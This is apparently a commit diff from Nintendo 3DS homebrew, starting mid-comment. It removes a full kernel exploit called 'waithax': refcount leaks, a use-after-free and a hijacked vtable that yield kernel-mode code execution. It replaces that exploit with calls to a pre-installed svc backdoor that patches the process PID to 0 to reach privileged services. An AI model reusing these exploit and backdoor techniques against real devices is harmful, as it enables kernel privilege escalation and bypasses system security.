@ first "bx lr" is the kernel-mode trampoline (its address is r0 = pc + 12
@ at the time of the svc).
.global svc_7b
.type svc_7b, %function
svc_7b:
push {r0, r1, r2}       @ spill entry_fn + up to two args
mov r3, sp              @ r3 = argument block
add r0, pc, #12         @ r0 = address of the trampoline below
svc 0x7b                @ Backdoor: kernel calls the trampoline
add sp, sp, #8
ldr r0, [sp], #4        @ fetch result stored by the trampoline
bx lr
@ ---- kernel-mode trampoline ----
cpsid aif               @ mask interrupts
ldr r2, [r3], #4        @ r2 = entry_fn
ldmfd r3!, {r0, r1}     @ load its two arguments
push {r3, lr}
blx r2                  @ call entry_fn(arg0, arg1)
pop {r3, lr}
str r0, [r3, #-4]!      @ store result back for user mode
mov r0, #0
bx lr

View File

@ -1,204 +0,0 @@
#include <3ds.h>
#include <stdio.h>
#include <string.h>
#include "waithax.h"
#include "utils.h"
static Handle g_backdoor_semaphore;
static KSemaphore* g_backdoor_ksemaphore;
static KSemaphore* g_hax_ksemaphore;
static KSemaphore g_backup_data;
static void* g_fake_ksemaphore_vtable[KSEMAPHORE_VTABLESIZE / sizeof(void*)];
static void (*g_backdoor_method)(void);
static u32 g_exploit_result = 0;
static bool g_debug_mode = false;
// Kernel-mode helper (debug mode only): set a KSemaphore's refcount
// directly instead of leaking references via WaitSynchronizationN.
static void K_Debug_PatchRefcount(KSemaphore *semaphore, u32 value)
{
    semaphore->refCount = value;
}

// Fake vtable method installed by waithax_run(): kernel-side virtual calls
// routed through the patched vtable land here and run the user-selected
// g_backdoor_method in kernel mode.
static bool waithax_kernel11_backdoor(KSemaphore *this, void *thread)
{
    g_backdoor_method();
    return true;
}

// First kernel-mode payload, reached through the corrupted "hax"
// KSemaphore's vtable. Stabilizes the exploited object and redirects the
// "backdoor" KSemaphore's vtable into user memory for later repointing.
static void waithax_kernel11_setup_step1(KSemaphore *this)
{
    // Turn interrupts off
    __asm__ volatile("cpsid aif");

    // Backup the KObjectLink from the hax semaphore location
    memcpy(&g_backup_data, this, sizeof(KSemaphore));

    // Copy a valid KSemaphore on the current semaphore to prevent crashes after
    // returning from this fake vtable method
    memcpy(this, g_backdoor_ksemaphore, sizeof(KSemaphore));

    // Copy the KSemaphore vtable from kernel memory to the current userland
    // process' memory
    memcpy(g_fake_ksemaphore_vtable, this->vtable, KSEMAPHORE_VTABLESIZE);

    // Point the "backdoor" KSemaphore's vtable to the fake vtable located in
    // the current userland process' memory
    g_backdoor_ksemaphore->vtable = g_fake_ksemaphore_vtable;

    // Increment the refcount to not cause an unwanted deallocation when
    // WaitSynchronization1 terminates.
    this->refCount++;

    // Write the exploit result to validate the kernel code execution
    g_exploit_result = 0xcafebabe;
}

// Second kernel-mode payload: undo the corruption at the "hax" KSemaphore's
// kernel slot once the backdoor is established.
static void waithax_kernel11_setup_step2(void)
{
    // Turn interrupts off
    __asm__ volatile("cpsid aif");

    // Restore KObjectLink on the hax semaphore location
    memcpy(g_hax_ksemaphore, &g_backup_data, sizeof(KSemaphore));
}
// Drives a KSemaphore's kernel refcount toward `value` by repeatedly
// issuing svcWaitSynchronizationN calls that fail on a bogus handle after
// referencing the preceding copies (the reference leak credited to TuxSH
// in svc.s). Can take a very long time; progress is printed throughout.
static void waithax_setRefCount(Handle handle, u32 value)
{
    s64 outInfo;
    Result res = svcGetHandleInfo(&outInfo, handle, 1);
    u32 refCount = outInfo & 0xFFFFFFFF;
    printf("Handle %08lx, count: %08lx, res %08lx\n", handle, refCount, res);

    if(refCount == value)
        return;

    // Number of leaked references still needed (wraps when overshooting).
    u32 loop = value - refCount;
    if(refCount > value)
        loop = (u32) -refCount + value;

    s32 out;
    Handle handles[0x100];
    for(u32 i = 0; i < 0x100; i++)
        handles[i] = handle;

    // Invalid trailing handle: the call fails there, leaking 0xFF
    // references to `handle` per invocation.
    handles[0xFF] = 0xDEADDEAD;

    u32 bulkLoop = loop / 0xFF;
    u32 individualLoop = loop % 0xFF;

    for(u32 i = 0; i < bulkLoop; i++)
    {
        res = svcWaitSynchronizationN(&out, handles, 0x100, true, 0);
        refCount += 0xFF;

        if(i % 0x10000 == 0)
            printf("Left: %08lx | i: %08lx | count: %08lx\n", bulkLoop - i, i,
                   refCount);
    }

    // Finish the remainder one leaked reference at a time.
    handles[1] = 0xDEADDEAD;
    for(u32 i = 0; i < individualLoop; i++)
    {
        res = svcWaitSynchronizationN(&out, handles, 2, true, 0);
        refCount++;

        printf("Left: %08lx | i: %08lx | count: %08lx\n", individualLoop - i, i,
               refCount);
    }
}
static void wait_thread(void *h)
{
Handle semaphore = (Handle)h;
Result res = svcWaitSynchronization(semaphore, 4000000000LL);
printf("Thread WaitSync res: %08lx\n", res);
}
// waithax: obtains Kernel11-mode code execution on 11.0-11.2 kernels.
// Outline (as implemented below): create KSemaphores whose kernel addresses
// are leaked via svcCreateSemaphoreKAddr; zero the "hax" semaphore's
// refcount; free it while a thread still waits on it, which ends up
// invoking waithax_kernel11_setup_step1 in kernel mode (the "vtable"
// semaphore's maxCount was set to that function's address); step1 then
// redirects the "backdoor" semaphore's vtable into user memory so
// waithax_backdoor() works. Returns true if the kernel payload ran.
bool waithax_run(void)
{
    Result res;
    Handle sHax, sVtable;
    Thread thWait;
    u32 *kObject;

    // Setup KSemaphores
    res = svcCreateSemaphoreKAddr(&sHax, 0, 5, (u32**)&g_hax_ksemaphore);
    printf("Creating KSemaphore: %08lx h%08lx @%08lx\n", res, sHax,
           (u32)g_hax_ksemaphore);
    res = svcCreateSemaphoreKAddr(&sVtable, 0,
                                  (u32)waithax_kernel11_setup_step1, &kObject);
    printf("Creating KSemaphore: %08lx h%08lx @%08lx\n", res, sVtable,
           (u32)kObject);
    res = svcCreateSemaphoreKAddr(&g_backdoor_semaphore, 0, 5,
                                  (u32**)&g_backdoor_ksemaphore);
    printf("Creating KSemaphore: %08lx h%08lx @%08lx\n", res,
           g_backdoor_semaphore, (u32)g_backdoor_ksemaphore);

    // Setup the refcount
    if(g_debug_mode)
        svc_7b(K_Debug_PatchRefcount, g_hax_ksemaphore, 0U);
    else
        waithax_setRefCount(sHax, 0U);

    // Free the "vtable" KSemaphore
    svcCloseHandle(sVtable);

    // Spawn the wait thread
    printf("Spawning wait thread\n");
    thWait = threadCreate(wait_thread, (void*)sHax, 0x4000, 0x20, -2, true);

    // Deallocate the "hax" KSemaphore
    printf("Freeing hax KSemaphore\n");
    svcCloseHandle(sHax);

    // Wait for the thread execution to end, at which point Kernel11-mode code
    // will have been executed
    printf("Waiting for thread\n");
    threadJoin(thWait, 15000000000LL);

    // Setup the fake vtable method for the "backdoor" KSemaphore to run
    // Kernel11-mode code in a better environment and in an easier way
    printf("Setting up fake vtable method\n");
    g_fake_ksemaphore_vtable[12] = waithax_kernel11_backdoor;

    // Restore "hax" KSemaphore data
    waithax_backdoor(waithax_kernel11_setup_step2);

    // Return exploit result
    printf("Exploit result: %08lx\n", g_exploit_result);
    return g_exploit_result == 0xcafebabe;
}
// Releases the semaphore handle that backs waithax_backdoor().
void waithax_cleanup(void)
{
    svcCloseHandle(g_backdoor_semaphore);
}

// Debug mode: patch the refcount via svc 0x7B instead of the slow
// WaitSynchronizationN leak loop (requires svc 0x7B access already).
void waithax_debug(bool enabled)
{
    g_debug_mode = enabled;
}

// Runs `method` in Kernel11 mode: waiting on the backdoor semaphore routes
// through the fake vtable entry installed by waithax_run().
void waithax_backdoor(void (*method)(void))
{
    g_backdoor_method = method;
    svcWaitSynchronization(g_backdoor_semaphore, -1);
}

View File

@ -1,23 +0,0 @@
#pragma once

#include <3ds/types.h>

// Size of the kernel KSemaphore object and of its vtable (0x16 entries).
#define KSEMAPHORE_SIZE (0x2C)
#define KSEMAPHORE_VTABLESIZE (0x16 * sizeof(void*))

// Userland mirror of the kernel's KSemaphore layout (0x2C bytes, packed).
// __a/__b/__c/__ievent are unidentified members kept only for layout.
typedef struct KSemaphore {
    void **vtable;
    u32 refCount;
    u32 __a;
    u32 __b;
    u32 __c;
    u32 __ievent[3];
    u32 count;
    u32 maxCount;
    void *owner;
} __attribute__((packed)) KSemaphore;

// Runs the waithax exploit; true on success (see waithax.c).
bool waithax_run(void);
// Releases exploit resources once the backdoor is no longer needed.
void waithax_cleanup(void);
// Enables debug mode (refcount patched via svc 0x7B instead of the leak).
void waithax_debug(bool enabled);
// Runs `method` in Kernel11 mode via the installed backdoor.
void waithax_backdoor(void (*method)(void));

View File

@ -1,93 +1,108 @@
#include <sys/iosupport.h>
#include <malloc.h>
#include <stdio.h>
#include <3ds.h>
#include "core/clipboard.h"
#include "core/screen.h"
#include "core/util.h"
#include "hax/khax.h"
#include "ui/error.h"
#include "ui/mainmenu.h"
#include "ui/ui.h"
#include "ui/section/task/task.h"
static bool am_initialized = false;
static bool cfgu_initialized = false;
static bool ac_initialized = false;
static bool ptmu_initialized = false;
static bool pxidev_initialized = false;
static bool httpc_initialized = false;
static bool soc_initialized = false;
#define CURRENT_KPROCESS (*(void**) 0xFFFF9004)
#define KPROCESS_PID_OFFSET_OLD (0xB4)
#define KPROCESS_PID_OFFSET_NEW (0xBC)
static bool backdoor_ran = false;
static bool n3ds = false;
static u32 old_pid = 0;
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wreturn-type" // naked: result returns in r0
// Invokes svc 0x30 with a kernel-mode callback.
// NOTE(review): relies on a resident kernel patch (fasthax, per this
// commit) having replaced svc 0x30 with an svcBackdoor equivalent —
// confirm which svc slot the installed backdoor actually uses.
static __attribute__((naked)) Result svcGlobalBackdoor(s32 (*callback)()) {
    asm volatile(
        "svc 0x30\n"
        "bx lr"
    );
}
#pragma GCC diagnostic pop
// Kernel-mode callback: stash the current process' PID and patch it to 0.
// Setting backdoor_ran proves the backdoor svc actually executed this code.
static s32 patch_pid_kernel() {
    u32 *pidPtr = (u32*) (CURRENT_KPROCESS + (n3ds ? KPROCESS_PID_OFFSET_NEW : KPROCESS_PID_OFFSET_OLD));

    old_pid = *pidPtr;
    *pidPtr = 0;

    backdoor_ran = true;
    return 0;
}

// Kernel-mode callback: restore the PID saved by patch_pid_kernel().
static s32 restore_pid_kernel() {
    u32 *pidPtr = (u32*) (CURRENT_KPROCESS + (n3ds ? KPROCESS_PID_OFFSET_NEW : KPROCESS_PID_OFFSET_OLD));

    *pidPtr = old_pid;

    backdoor_ran = true;
    return 0;
}

// Temporarily patches this process' PID to 0 and re-registers with srv
// (which then grants privileged service access), then restores the PID.
// Returns false when the backdoor svc is not installed — in that case the
// kernel callbacks never ran and backdoor_ran stays false.
static bool attempt_patch_pid() {
    backdoor_ran = false;

    APT_CheckNew3DS(&n3ds);

    svcGlobalBackdoor(patch_pid_kernel);
    srvExit();
    srvInit();
    svcGlobalBackdoor(restore_pid_kernel);

    return backdoor_ran;
}
static void (*exitFuncs[16])()= {NULL};
static u32 exitFuncCount = 0;
static void* soc_buffer = NULL;
static u32 old_time_limit = UINT32_MAX;
void cleanup_services() {
if(soc_initialized) {
socExit();
if(soc_buffer != NULL) {
free(soc_buffer);
soc_buffer = NULL;
for(u32 i = 0; i < exitFuncCount; i++) {
if(exitFuncs[i] != NULL) {
exitFuncs[i]();
exitFuncs[i] = NULL;
}
soc_initialized = false;
}
if(httpc_initialized) {
httpcExit();
httpc_initialized = false;
}
exitFuncCount = 0;
if(pxidev_initialized) {
pxiDevExit();
pxidev_initialized = false;
}
if(ptmu_initialized) {
ptmuExit();
ptmu_initialized = false;
}
if(ac_initialized) {
acExit();
ac_initialized = false;
}
if(cfgu_initialized) {
cfguExit();
cfgu_initialized = false;
}
if(am_initialized) {
amExit();
am_initialized = false;
if(soc_buffer != NULL) {
free(soc_buffer);
soc_buffer = NULL;
}
}
#define INIT_SERVICE(initStatement, exitFunc) (R_SUCCEEDED(res = (initStatement)) && (exitFuncs[exitFuncCount++] = (exitFunc)))
Result init_services() {
Result res = 0;
Handle tempAM = 0;
if(R_SUCCEEDED(res = srvGetServiceHandle(&tempAM, "am:net"))) {
svcCloseHandle(tempAM);
soc_buffer = memalign(0x1000, 0x100000);
if(soc_buffer != NULL) {
Handle tempAM = 0;
if(R_SUCCEEDED(res = srvGetServiceHandle(&tempAM, "am:net"))) {
svcCloseHandle(tempAM);
if(R_SUCCEEDED(res = amInit()) && (am_initialized = true)
&& R_SUCCEEDED(res = cfguInit()) && (cfgu_initialized = true)
&& R_SUCCEEDED(res = acInit()) && (ac_initialized = true)
&& R_SUCCEEDED(res = ptmuInit()) && (ptmu_initialized = true)
&& R_SUCCEEDED(res = pxiDevInit()) && (pxidev_initialized = true)
&& R_SUCCEEDED(res = httpcInit(0)) && (httpc_initialized = true)) {
soc_buffer = memalign(0x1000, 0x100000);
if(soc_buffer != NULL) {
if(R_SUCCEEDED(res = socInit(soc_buffer, 0x100000))) {
soc_initialized = true;
}
} else {
res = R_FBI_OUT_OF_MEMORY;
}
if(INIT_SERVICE(amInit(), amExit)
&& INIT_SERVICE(cfguInit(), cfguExit)
&& INIT_SERVICE(acInit(), acExit)
&& INIT_SERVICE(ptmuInit(), ptmuExit)
&& INIT_SERVICE(pxiDevInit(), pxiDevExit)
&& INIT_SERVICE(httpcInit(0), httpcExit)
&& INIT_SERVICE(socInit(soc_buffer, 0x100000), (void (*)()) socExit));
}
} else {
res = R_FBI_OUT_OF_MEMORY;
}
if(R_FAILED(res)) {
@ -97,23 +112,7 @@ Result init_services() {
return res;
}
void cleanup() {
clipboard_clear();
task_exit();
ui_exit();
screen_exit();
if(old_time_limit != UINT32_MAX) {
APT_SetAppCpuTimeLimit(old_time_limit);
}
cleanup_services();
romfsExit();
gfxExit();
}
static u32 old_time_limit = UINT32_MAX;
void init() {
gfxInitDefault();
@ -125,25 +124,11 @@ void init() {
}
if(R_FAILED(init_services())) {
const devoptab_t* oldStdOut = devoptab_list[STD_OUT];
const devoptab_t* oldStdErr = devoptab_list[STD_ERR];
consoleInit(GFX_TOP, NULL);
util_store_console_std();
if(!khax_execute()) {
printf("Press any key to exit.\n");
util_panic_quiet();
if(!attempt_patch_pid()) {
util_panic("Kernel backdoor not installed.\nPlease run a kernel exploit and try again.\n");
return;
}
devoptab_list[STD_OUT] = oldStdOut;
devoptab_list[STD_ERR] = oldStdErr;
gfxSetScreenFormat(GFX_TOP, GSP_BGR8_OES);
gfxSetDoubleBuffering(GFX_TOP, true);
Result initRes = init_services();
if(R_FAILED(initRes)) {
util_panic("Failed to initialize services: %08lX", initRes);
@ -167,6 +152,26 @@ void init() {
task_init();
}
void cleanup() {
clipboard_clear();
task_exit();
ui_exit();
screen_exit();
if(old_time_limit != UINT32_MAX) {
APT_SetAppCpuTimeLimit(old_time_limit);
}
osSetSpeedupEnable(false);
cleanup_services();
romfsExit();
gfxExit();
}
int main(int argc, const char* argv[]) {
if(argc > 0) {
util_set_3dsx_path(argv[0]);